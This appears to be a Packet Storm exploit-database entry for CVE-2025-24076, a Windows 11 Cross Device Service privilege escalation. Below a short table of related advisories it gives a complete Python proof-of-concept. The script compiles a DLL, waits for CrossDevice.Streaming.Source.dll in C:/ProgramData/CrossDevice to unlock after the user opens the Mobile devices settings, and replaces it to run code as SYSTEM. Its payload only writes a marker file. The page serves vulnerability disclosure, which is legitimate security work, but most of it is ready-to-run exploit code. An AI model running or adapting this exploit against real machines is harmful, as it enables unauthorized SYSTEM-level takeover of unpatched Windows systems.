📄 Microsoft Windows 11 Version 24H2 Privilege Escalation

🗓️ 09 Jun 2025 00:00:00Reported by Mohammed Idrees BanyamerType

packetstorm🔗 packetstorm.news👁 149 Views

Cross Device Service has improper access control; local attackers can overwrite a library in a writable folder and escalate to SYSTEM.

Reporter	Title	Published	Views	Family All 26
Circl	CVE-2025-24076	11 Mar 202516:39	–	circl
CNNVD	Microsoft Windows 访问控制错误漏洞	11 Mar 202500:00	–	cnnvd
CVE	CVE-2025-24076	11 Mar 202516:59	–	cve
Cvelist	CVE-2025-24076 Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability	11 Mar 202516:59	–	cvelist
Exploit DB	Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege	9 Jun 202500:00	–	exploitdb
EUVD	EUVD-2025-6325	3 Oct 202520:07	–	euvd
GithubExploit	Exploit for Improper Access Control in Microsoft	6 Jun 202521:35	–	githubexploit
Microsoft KB	March 11, 2025—KB5053598 (OS Build 26100.3476)	11 Mar 202507:00	–	mskb
Microsoft KB	March 11, 2025—KB5053599 (OS Build 25398.1486)	11 Mar 202507:00	–	mskb
Microsoft KB	March 11, 2025—KB5053602 (OS Builds 22621.5039 and 22631.5039)	11 Mar 202507:00	–	mskb

#!/usr/bin/env python3
    # Exploit Title: Microsoft Windows 11 Version 24H2 Cross Device Service - Elevation of Privilege
    # Author: Mohammed Idrees Banyamer
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Date: 2025-06-06
    # Tested on: Windows 11 Version 24H2 for x64-based Systems (10.0.26100.3476)
    # CVE: CVE-2025-24076
    #
    # Affected Versions:
    # - Windows 11 Version 24H2 (x64 and ARM64)
    # - Windows 11 Version 23H2 (x64 and ARM64)
    # - Windows 11 Version 22H2 (x64 and ARM64)
    # - Windows Server 2025
    # - Windows Server 2022 23H2 (Server Core installation)
    #
    # Type: Elevation of Privilege
    # Platform: Microsoft Windows
    # Author Country: Jordan
    # CVSS v3.1 Score: 7.3 (Important)
    # Weakness: CWE-284: Improper Access Control
    # Attack Vector: Local
    # Privileges Required: Low
    # User Interaction: Required
    # Scope: Unchanged
    # Confidentiality, Integrity, Availability Impact: High
    # Exploit Code Maturity: Unproven
    # Remediation Level: Official Fix
    # Description:
    # This vulnerability affects Microsoft Windows 11 (various versions including 24H2, 23H2, and 22H2)
    # and Windows Server 2025. It targets improper access control in the Windows Cross Device Service,
    # allowing a low-privileged local attacker to overwrite a critical DLL file (CrossDevice.Streaming.Source.dll)
    # in a writable directory. After triggering user interaction by opening Windows "Mobile devices" Settings,
    # the attacker can replace the DLL with a malicious version, leading to SYSTEM privilege escalation.
    #
    # Steps of exploitation:
    # 1. Verify the presence of the vulnerable DLL in the writable directory.
    # 2. Build a malicious DLL that executes code with SYSTEM privileges upon loading.
    # 3. Backup the original DLL to allow recovery.
    # 4. Trigger the DLL load by instructing the user to open the "Mobile devices" Settings page.
    # 5. Wait until the DLL is unlocked and replace it with the malicious DLL.
    # 6. Achieve SYSTEM privileges when the system loads the malicious DLL.
    #
    # This exploit requires low privileges and user interaction but has low attack complexity
    # and results in high impact due to full privilege escalation.
    #
    
    
    
    import os
    import shutil
    import time
    from pathlib import Path
    import subprocess
    
    # Target DLL name based on vulnerability research
    DLL_NAME = "CrossDevice.Streaming.Source.dll"
    TARGET_PATH = Path("C:/ProgramData/CrossDevice")
    MALICIOUS_DLL = Path("malicious.dll")
    BACKUP_ORIGINAL_DLL = Path("original_backup.dll")
    
    # C source code for malicious DLL
    MALICIOUS_C_CODE = r'''
    #include <windows.h>
    #include <stdio.h>
    
    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
        if (fdwReason == DLL_PROCESS_ATTACH) {
            FILE *file = fopen("C:\\poc_only_admin_can_write_to_c.txt", "w");
            if (file) {
                fputs("Exploit succeeded! You have SYSTEM privileges.\n", file);
                fclose(file);
            }
        }
        return TRUE;
    }
    '''
    
    def build_malicious_dll():
        print("[*] Building malicious DLL from C source...")
        c_file = Path("malicious.c")
        # Write C source code to file
        with open(c_file, "w") as f:
            f.write(MALICIOUS_C_CODE)
        # Compile DLL using gcc (MinGW)
        compile_cmd = [
            "gcc", "-shared", "-o", str(MALICIOUS_DLL), str(c_file),
            "-Wl,--subsystem,windows"
        ]
        try:
            subprocess.run(compile_cmd, check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            print(f"[+] Malicious DLL built successfully: {MALICIOUS_DLL}")
            # Clean up C source file
            c_file.unlink()
            return True
        except subprocess.CalledProcessError as e:
            print("[!] Failed to build malicious DLL.")
            print("gcc output:", e.stderr.decode())
            return False
    
    def is_vulnerable():
        if not TARGET_PATH.exists():
            print("[!] Target directory not found.")
            return False
        dll_path = TARGET_PATH / DLL_NAME
        if not dll_path.exists():
            print("[!] Target DLL not found.")
            return False
        print("[+] System appears vulnerable, DLL found in a writable path.")
        return True
    
    def backup_original():
        dll_path = TARGET_PATH / DLL_NAME
        backup_path = TARGET_PATH / BACKUP_ORIGINAL_DLL
        shutil.copyfile(dll_path, backup_path)
        print(f"[+] Backup created at: {backup_path}")
    
    def replace_with_malicious():
        dll_path = TARGET_PATH / DLL_NAME
        try:
            shutil.copyfile(MALICIOUS_DLL, dll_path)
            print("[+] Successfully replaced the DLL with malicious version.")
            return True
        except PermissionError:
            print("[!] Cannot write to DLL. Make sure the process using it is stopped.")
            return False
    
    def monitor_and_replace():
        dll_path = TARGET_PATH / DLL_NAME
        print("[*] Monitoring DLL until it is unlocked...")
        while True:
            try:
                with open(dll_path, 'rb+') as f:
                    print("[+] File is unlocked. Attempting replacement...")
                    time.sleep(0.5)
                    return replace_with_malicious()
            except PermissionError:
                time.sleep(0.5)
    
    def trigger_com():
        print("[*] To trigger DLL load, please open Windows Settings -> Mobile devices")
        input("[*] After opening Settings, press Enter to continue...")
    
    def main():
        if not build_malicious_dll():
            return
        if not is_vulnerable():
            return
    
        backup_original()
        trigger_com()
    
        success = monitor_and_replace()
        if success:
            print("[✓] Exploit completed successfully. Check results (e.g., C:\\poc_only_admin_can_write_to_c.txt).")
        else:
            print("[✗] Exploit failed.")
    
    if __name__ == "__main__":
        main()

09 Jun 2025 00:00Current

7High risk

Vulners AI Score7

CVSS 3.17.3

EPSS0.03957

SSVC